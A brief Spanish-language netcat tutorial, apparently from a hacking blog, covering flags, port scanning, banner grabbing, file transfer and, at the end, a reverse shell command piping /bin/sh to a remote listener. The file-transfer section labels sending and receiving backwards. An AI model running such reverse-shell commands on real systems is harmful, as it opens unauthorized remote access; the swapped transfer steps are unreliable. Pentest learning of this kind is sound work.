Netcat
Índice
Definción
Es una herramienta de red que permite a través de intérprete de comandos y con una sintaxis sencilla abrir puertos TCP/UDP en un HOST, asociar una shell a un puerto en concreto y forzar conexiones UDP/TCP. Esta herramienta es conocida como la navaja suiza ya que sirve para todos en el mundo del hacking.
Parámetros
- -n ➜ Deshabilita la resolución DNS
- -v ➜ Modo verbose
- -l ➜ Modo listener (Crear un handler)
- -w ➜ Timeout
- -e ➜ Ejecución de comandos
- -p ➜ Puerto
Escáneo
Vemos un primer ejemplo, de un escaneo a un puerto en concreto.
1
nc -vw2 192.168.10.123 80
Tambien podemos hacer un escaneo por rangos.
1
nc -vw2 192.168.10.123 1-100
Banner
Podemos visualizar el banner para ver que servicio corre y versión.
1
nc -nv 192.168.10.123 80
Archivos
Podemos enviar archivos de un host a otro. Para enviar un archivo usaremos la siguiente sintaxis.
1
nc 192.168.10.123 1111 > script.py
Para recibirlo ejecutamos lo siguiente.
1
nc -lvp 1111 < script.py
Shell
Al igual que con python, php, bash, powershell, etc, podemos hacer una conexión para conseguir una shell. Primero nos ponemos a la escucha esperando la conexión.
1
nc -lvnp 1111
Ahora que estamos a la escucha, vamos a enviarnos la shell, para poder ejecutar comandos del sistema.
1
nc 192.168.10.123 1111 -e "/bin/sh"